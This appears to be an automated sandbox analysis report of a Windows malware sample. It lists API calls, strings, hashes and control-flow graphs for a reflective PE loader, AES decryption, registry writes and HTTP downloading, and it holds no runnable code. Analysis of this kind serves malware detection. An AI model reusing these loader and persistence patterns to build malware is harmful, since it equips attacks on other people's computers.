FreeLibrary 41339->41341 41342 4104dd 41339->41342 41340->41339 41343 4105d3 41340->41343 41341->41342 41342->41312 41343->41339 41344->41325 41346 4103c3 __FrameHandler3::FrameUnwindToState _unexpected 41345->41346 41348 410427 _unexpected 41346->41348 41352 411fe5 14 API calls 2 library calls 41346->41352 41348->41327 41353 4108d3 LeaveCriticalSection 41349->41353 41351 41035f 41351->41317 41351->41330 41352->41348 41353->41351 41357 414fe9 5 API calls _unexpected 41354->41357 41356 41056c _unexpected 41356->41332 41357->41356 41358 4b4003c 41359 4b40049 41358->41359 41373 4b40e0f SetErrorMode SetErrorMode 41359->41373 41364 4b40265 41365 4b402ce VirtualProtect 41364->41365 41367 4b4030b 41365->41367 41366 4b40439 VirtualFree 41371 4b405f4 LoadLibraryA 41366->41371 41372 4b404be 41366->41372 41367->41366 41368 4b404e3 LoadLibraryA 41368->41372 41370 4b408c7 41371->41370 41372->41368 41372->41371 41374 4b40223 41373->41374 41375 4b40d90 41374->41375 41376 4b40dad 41375->41376 41377 4b40dbb GetPEB 41376->41377 41378 4b40238 VirtualAlloc 41376->41378 41377->41378 41378->41364 41379 aaa0d3 41380 aaa0d8 VirtualProtect 41379->41380 41382 aaa13a 41380->41382 41383 9acf53 41384 9b0497 41383->41384 41385 9b069d RegOpenKeyA 41384->41385 41386 9b06c4 RegOpenKeyA 41384->41386 41385->41386 41387 9b06ba 41385->41387 41388 9b06e1 41386->41388 41387->41386 41389 9b0725 GetNativeSystemInfo 41388->41389 41390 9ad902 41388->41390 41389->41390 41391 100079ee 41392 10007a2c 41391->41392 41397 100079fc __dosmaperr 41391->41397 41399 10005926 12 API calls __dosmaperr 41392->41399 41393 10007a17 RtlAllocateHeap 41395 10007a2a 41393->41395 41393->41397 41397->41392 41397->41393 41398 10005aed EnterCriticalSection LeaveCriticalSection __dosmaperr 41397->41398 41398->41397 41399->41395 41400 9acf25 LoadLibraryA 41401 9ae4ff 41400->41401
                                          APIs
                                          • GetTempPathA.KERNEL32(00000104,?,F6E2F767,74DF0F00,00000000), ref: 00403D8A
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F19
                                          • Sleep.KERNEL32(000003E8), ref: 00403F22
                                          • __Init_thread_footer.LIBCMT ref: 004044F7
                                          • __Init_thread_footer.LIBCMT ref: 004046BD
                                          • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 004048C7
                                          • __Init_thread_footer.LIBCMT ref: 00404955
                                          • __Init_thread_footer.LIBCMT ref: 00404BBE
                                          • CoInitialize.OLE32(00000000), ref: 00404C3F
                                          • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404C5A
                                          • __Init_thread_footer.LIBCMT ref: 004050BD
                                          • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                          • __Init_thread_footer.LIBCMT ref: 004053CB
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404CC8
                                            • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,F6E2F767), ref: 004107F7
                                            • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                          • CoUninitialize.COMBASE(?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D,?,?,?,?,00000000,0042DA28), ref: 00404D01
                                          • CoUninitialize.OLE32(?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404DC4
                                          • CoUninitialize.OLE32(?,?,?,?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404E45
                                          • __Init_thread_footer.LIBCMT ref: 00404026
                                            • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                            • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                            • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            • Part of subcall function 004021F0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                            • Part of subcall function 004021F0: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                            • Part of subcall function 004021F0: CloseHandle.KERNEL32(00000000), ref: 0040224E
                                          • __Init_thread_footer.LIBCMT ref: 00404202
                                            • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                            • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                          • String ID: KDOX$SUB=$]DFE$^OX*$get$viFO
                                          • API String ID: 995133137-4208347134
                                          • Opcode ID: 707aadf0ad7efe9cfe25786436bfbcbcee470b857402ad826f90f51f489fb38e
                                          • Instruction ID: 2a7656185698f67e8fe61b04cbca63a222de47e8cf16a67dea48f36782a400ee
                                          • Opcode Fuzzy Hash: 707aadf0ad7efe9cfe25786436bfbcbcee470b857402ad826f90f51f489fb38e
                                          • Instruction Fuzzy Hash: 7BF2D1B0E042188BDB24DF24CC49B9EBBB1EF45304F5441E9E5097B2D2DB78AA85CF59
                                          APIs
                                            • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,F6E2F767), ref: 004107F7
                                            • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                            • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                          • __Init_thread_footer.LIBCMT ref: 004050BD
                                          • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                          • __Init_thread_footer.LIBCMT ref: 004053CB
                                          • Sleep.KERNEL32(000007D0), ref: 00405735
                                          • Sleep.KERNEL32(000007D0), ref: 0040574F
                                          • CoUninitialize.OLE32(?,?,0042DB3D,?,?,?,?,?,?,?,?,?,?,00000000,0042DB21), ref: 00405785
                                          • CoUninitialize.OLE32(?,?,?,?,?,0042DB3D,?,?,?,?,?,?,?), ref: 004057B1
                                          • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                          • Sleep.KERNEL32(000005DC), ref: 00405A90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                          • String ID: DFEK$SUB=$get$mixone$updateSW$U%
                                          • API String ID: 606935701-3680244588
                                          • Opcode ID: 5eb90190946517c244c656875080c9f0771ae3840bd27c0281f4b0b2f0e03175
                                          • Instruction ID: 0d5b8b6ccd7ac2cce54ba59243f10dcebe2db4c82d63bd9967a8cdfa7b9099a4
                                          • Opcode Fuzzy Hash: 5eb90190946517c244c656875080c9f0771ae3840bd27c0281f4b0b2f0e03175
                                          • Instruction Fuzzy Hash: F5D20471D001148BDB14EB24CC597AEBB75AF01308F5481BEE8097B2D2DB78AE85CF99

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2198 402ec0-402ede 2199 402ee0-402f07 SetLastError call 4029f0 call 4099d7 2198->2199 2200 402f08-402f10 2198->2200 2202 402f12 2200->2202 2203 402f3d-402f47 2200->2203 2205 402f17-402f3c call 4029f0 SetLastError call 4099d7 2202->2205 2206 402f71-402f7f 2203->2206 2207 402f49-402f70 SetLastError call 4029f0 call 4099d7 2203->2207 2209 402f81-402f86 2206->2209 2210 402f88-402f91 2206->2210 2209->2205 2214 402f93-402f98 2210->2214 2215 402f9d-402fa5 2210->2215 2214->2205 2219 402fb1-402fbe 2215->2219 2220 402fa7-402fac 2215->2220 2223 402fc0-402fc2 2219->2223 2224 402fe7-40300a GetNativeSystemInfo 2219->2224 2220->2205 2228 402fc5-402fcc 2223->2228 2226 403016-40302e VirtualAlloc 2224->2226 2227 40300c-403011 2224->2227 2229 403030-403040 VirtualAlloc 2226->2229 2230 403056-403075 HeapAlloc 2226->2230 2227->2205 2231 402fd3 2228->2231 2232 402fce-402fd1 2228->2232 2229->2230 2233 403042-40304f call 4029f0 2229->2233 2239 403077-403084 VirtualFree 2230->2239 2240 40308b-4030d1 2230->2240 2234 402fd5-402fe2 2231->2234 2232->2234 2233->2230 2234->2228 2237 402fe4 2234->2237 2237->2224 2239->2240 2241 4030d7-4030d9 SetLastError 2240->2241 2242 40316f-4031b9 VirtualAlloc call 40afb0 2240->2242 2244 4030df-4030e3 2241->2244 2249 40326d-403278 2242->2249 2250 4031bf 2242->2250 2246 4030e5-4030f2 2244->2246 2247 4030f6-403106 call 40fab8 2244->2247 2246->2247 2255 403135-40313a 2247->2255 2256 403108-40310d 2247->2256 2253 4032fd 2249->2253 2254 40327e-403285 2249->2254 2252 4031c2-4031c7 2250->2252 2258 403206-40320e 2252->2258 2259 4031c9-4031d1 2252->2259 2257 403302-40330e call 402cd0 2253->2257 2260 403287-403289 2254->2260 2261 40328e-4032a0 2254->2261 2269 40313c-40314c 2255->2269 2270 40314f-40316e HeapFree call 4099d7 2255->2270 2264 40312c-403132 call 40fab8 2256->2264 2265 40310f 2256->2265 2257->2244 2284 403314-403316 call 402b50 2257->2284 2258->2241 2263 403214-403227 call 402e30 2258->2263 2267 403252-403264 2259->2267 2268 4031d3-4031ed 2259->2268 2260->2257 2261->2253 2262 4032a2-4032b7 2261->2262 2271 4032b9-4032bc 2262->2271 2272 4032ee-4032f8 2262->2272 2280 403229-40322e 2263->2280 2264->2255 2273 403110-403115 2265->2273 2267->2252 2276 40326a 2267->2276 2268->2244 2287 4031f3-403204 call 40b530 2268->2287 2269->2270 2278 4032c0-4032d1 2271->2278 2272->2262 2281 4032fa 2272->2281 2282 403126-40312a 2273->2282 2283 403117-403123 2273->2283 2276->2249 2288 4032d3-4032db 2278->2288 2289 4032de-4032ec 2278->2289 2280->2244 2291 403234-403249 call 40afb0 2280->2291 2281->2253 2282->2264 2282->2273 2283->2282 2297 40331b-40331d 2284->2297 2303 40324c-40324f 2287->2303 2288->2289 2289->2272 2289->2278 2291->2303 2297->2244 2300 403323-40332d 2297->2300 2301 403351-403358 2300->2301 2302 40332f-403338 2300->2302 2305 4033aa-4033c3 call 4099d7 2301->2305 2306 40335a-403363 2301->2306 2302->2301 2304 40333a-40333e 2302->2304 2303->2267 2304->2301 2307 403340-40334f 2304->2307 2309 403394-4033a9 call 4099d7 2306->2309 2310 403365-40336e 2306->2310 2307->2301 2316 403370 2310->2316 2317 40337a-403393 call 4099d7 2310->2317 2316->2317
                                          APIs
                                          • SetLastError.KERNEL32(0000000D), ref: 00402EE2
                                          • SetLastError.KERNEL32(000000C1), ref: 00402F24
                                          Strings
                                          • p.@P.@0.@, xrefs: 004030C5
                                          • alignedImageSize != AlignValueUp!, xrefs: 0040300C
                                          • DOS header is not valid!, xrefs: 00402F12
                                          • Size is not valid!, xrefs: 00402EE8
                                          • DOS header size is not valid!, xrefs: 00402F51
                                          • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402F81
                                          • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402F93
                                          • Section alignment invalid!, xrefs: 00402FA7
                                          • ERROR_OUTOFMEMORY!, xrefs: 00403042
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$p.@P.@0.@
                                          • API String ID: 1452528299-2075088523
                                          • Opcode ID: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                          • Instruction ID: 9256140b0f890bfcd87a01f3051d579660d3e2dc250f0df49545701e60f9fd82
                                          • Opcode Fuzzy Hash: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                          • Instruction Fuzzy Hash: CCF1CE71B002059BCB10CFA9D985BAAB7B4BF48305F14417AE909EB3C2D779ED11CB98

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2391 4035b0-403638 CryptAcquireContextW 2392 4036fa-403710 GetLastError CryptReleaseContext 2391->2392 2393 40363e-40365c CryptCreateHash 2391->2393 2394 403844-40384a 2392->2394 2393->2392 2395 403662-403675 2393->2395 2396 403874-403891 call 4099d7 2394->2396 2397 40384c-403858 2394->2397 2398 403678-40367d 2395->2398 2399 40386a-403871 call 409b3c 2397->2399 2400 40385a-403868 2397->2400 2398->2398 2401 40367f-4036c6 call 409b4a call 40fcdf CryptHashData 2398->2401 2399->2396 2400->2399 2403 403892-4038a5 call 40cfaf 2400->2403 2415 4036d6-4036f8 CryptDeriveKey 2401->2415 2416 4036c8-4036d1 GetLastError 2401->2416 2413 4038a7-4038ae 2403->2413 2414 4038b8 2403->2414 2413->2414 2420 4038b0-4038b4 2413->2420 2415->2392 2417 403715-403716 call 40fb0d 2415->2417 2416->2394 2421 40371b-403767 call 40afb0 call 409b4a 2417->2421 2420->2414 2426 403838-40383e CryptDestroyKey 2421->2426 2427 40376d-40377c 2421->2427 2426->2394 2428 403782-40378b 2427->2428 2429 403799-4037d4 call 40afb0 CryptDecrypt 2428->2429 2430 40378d-40378f 2428->2430 2429->2426 2433 4037d6-403801 call 40afb0 2429->2433 2430->2429 2433->2426 2436 403803-403832 2433->2436 2436->2426 2436->2428
                                          APIs
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,F6E2F767), ref: 00403630
                                          • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403654
                                          • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036BE
                                          • GetLastError.KERNEL32 ref: 004036C8
                                          • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004036F0
                                          • GetLastError.KERNEL32 ref: 004036FA
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040370A
                                          • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037CC
                                          • CryptDestroyKey.ADVAPI32(?), ref: 0040383E
                                          Strings
                                          • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040360C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                          • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                          • API String ID: 3761881897-63410773
                                          • Opcode ID: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                          • Instruction ID: 8181a1f98bd0149a833479ac616fd79743055c61a592a1420c0c523c4d9566d8
                                          • Opcode Fuzzy Hash: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                          • Instruction Fuzzy Hash: 37819171A00218AFEF209F25CC45B9ABBB9FF45300F0081BAF90DA7291DB359E858F55

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2437 402a20-402a37 2438 402a79-402a8d call 4099d7 2437->2438 2439 402a39-402a42 2437->2439 2441 402a44-402a49 2439->2441 2442 402a8e-402ad0 VirtualProtect 2439->2442 2441->2438 2445 402a4b-402a50 2441->2445 2442->2438 2444 402ad2-402af4 GetLastError FormatMessageA 2442->2444 2446 402af7-402afc 2444->2446 2447 402a52-402a5a 2445->2447 2448 402a66-402a73 call 402e50 2445->2448 2446->2446 2449 402afe-402b4a LocalAlloc call 4029b0 OutputDebugStringA LocalFree * 2 call 4099d7 2446->2449 2447->2448 2450 402a5c-402a64 2447->2450 2453 402a75 2448->2453 2450->2448 2452 402a78 2450->2452 2452->2438 2453->2452
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AC8
                                          • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402ADD
                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402AEB
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B06
                                          • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B25
                                          • LocalFree.KERNEL32(00000000), ref: 00402B32
                                          • LocalFree.KERNEL32(?), ref: 00402B37
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                          • String ID: %s: %s$Error protecting memory page
                                          • API String ID: 839691724-1484484497
                                          • Opcode ID: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                          • Instruction ID: 0c0000675eadf2e66051917e59d7aa22c0aaa2fc97c5d5fe75df83e4770fcd9e
                                          • Opcode Fuzzy Hash: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                          • Instruction Fuzzy Hash: 4B310731B00104AFDB10DF68DD44FAAB768EF48704F0541BEE905AB2D2DB75AE06CB98

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2630 401940-401a18 InternetSetFilePointer InternetReadFile 2632 401a50-401a9d call 40b530 HttpQueryInfoA 2630->2632 2636 401aa3-401ad6 CoCreateInstance 2632->2636 2637 401dea-401e16 call 4099d7 2632->2637 2636->2637 2638 401adc-401ae3 2636->2638 2638->2637 2640 401ae9-401b06 2638->2640 2642 401b10-401b15 2640->2642 2642->2642 2643 401b17-401bde call 402730 call 4015e0 2642->2643 2651 401be0-401bef 2643->2651 2652 401c0f-401c11 2643->2652 2655 401bf1-401bff 2651->2655 2656 401c05-401c0c call 409b3c 2651->2656 2653 401c17-401c1e 2652->2653 2654 401dde-401de5 2652->2654 2653->2654 2658 401c24-401c9a call 409b4a 2653->2658 2654->2637 2655->2656 2659 401e19-401e1f call 40cfaf 2655->2659 2656->2652 2666 401ca0-401cb4 2658->2666 2667 401dc4-401dda call 4099e5 2658->2667 2669 401cba-401ce9 call 409b4a 2666->2669 2670 401d5e-401d75 2666->2670 2667->2654 2681 401d4a-401d5b call 4099e5 2669->2681 2682 401ceb-401ced 2669->2682 2671 401d77-401d79 2670->2671 2672 401dba-401dc2 2670->2672 2675 401d88-401d8a 2671->2675 2676 401d7b-401d86 call 40d09d 2671->2676 2672->2667 2679 401d8c-401d9c call 40afb0 2675->2679 2680 401d9e-401daf call 40b530 call 40d09d 2675->2680 2691 401db5 call 40cf9f 2676->2691 2679->2672 2680->2691 2681->2670 2686 401d05-401d1d call 40b530 2682->2686 2687 401cef-401cf1 2682->2687 2700 401d2c-401d38 2686->2700 2701 401d1f-401d2a call 40d09d 2686->2701 2687->2686 2694 401cf3-401d03 call 40afb0 2687->2694 2691->2672 2694->2681 2700->2681 2704 401d3a-401d3f call 40d09d 2700->2704 2707 401d45 call 40cf9f 2701->2707 2704->2707 2707->2681
                                          APIs
                                          • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004019D5
                                          • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004019F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileInternet$PointerRead
                                          • String ID: text
                                          • API String ID: 3197321146-999008199
                                          • Opcode ID: 3d034dae1a9451ddff1e7df622ae1b376f6377e5c580f08c5507c419aa9b7673
                                          • Instruction ID: 0125e10c814f2167b0c83c61a86ba883da1fe49b2781431745f5a2561ed14111
                                          • Opcode Fuzzy Hash: 3d034dae1a9451ddff1e7df622ae1b376f6377e5c580f08c5507c419aa9b7673
                                          • Instruction Fuzzy Hash: FAC15B709002189FDB24DF64CC85BD9B7B5EF49304F1041EAE509B72A1D778AE94CF99

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3595 ced0fe-ced117 3596 ced119-ced11b 3595->3596 3597 ced11d 3596->3597 3598 ced122-ced12e CreateToolhelp32Snapshot 3596->3598 3597->3598 3599 ced13e-ced14b Module32First 3598->3599 3600 ced130-ced136 3598->3600 3601 ced14d-ced14e call cecdbd 3599->3601 3602 ced154-ced15c 3599->3602 3600->3599 3605 ced138-ced13c 3600->3605 3606 ced153 3601->3606 3605->3596 3605->3599 3606->3602
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00CED126
                                          • Module32First.KERNEL32(00000000,00000224), ref: 00CED146
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609959909.0000000000CEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEC000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_cec000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: 6cfafc6de2db54e4556214a7ea6548f273d5faf892a07a3ce2e035387b508983
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: C8F096321007506FD7203BF6AC8DBAE76ECAF59734F100629F663911C0DB74ED458A61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: emp$mixtwo
                                          • API String ID: 3472027048-2390925073
                                          • Opcode ID: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                          • Instruction ID: d670b023532553bde9b5cd74a18030282768016b503e3e09e149c4df20b712b6
                                          • Opcode Fuzzy Hash: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                          • Instruction Fuzzy Hash: 15F01CB161430457E7147F65ED1B7173EA4970271CFA006ADD8141F2C2E7FB861A8BE6

                                          Control-flow Graph

                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                          • __cftof.LIBCMT ref: 10001624
                                          • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                          • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                          • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                          • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                          • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                          • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                          • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                          • String ID: GET$http://
                                          • API String ID: 1233269984-1632879366
                                          • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                          • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                          • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                          • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                          Control-flow Graph

                                          APIs
                                          • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401873
                                          • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401899
                                          • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018BF
                                            • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 00402599
                                          • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018E5
                                          Strings
                                          • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0040189D
                                          • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018C3
                                          • http://, xrefs: 00401EC4, 004021A3
                                          • GET, xrefs: 004020B7
                                          • text, xrefs: 00401B5F
                                          • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401877
                                          • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401832
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                          • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                          • API String ID: 2146599340-4172842843
                                          • Opcode ID: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                          • Instruction ID: d9449a1bc553b4f7263359658e85a8d5597bae1f9675cad689ed873ec2693fe7
                                          • Opcode Fuzzy Hash: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                          • Instruction Fuzzy Hash: A4316371D00109AFEB14DBE9CC85FEEB7B9EB08714F60812AE521731C0C7789945CBA4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
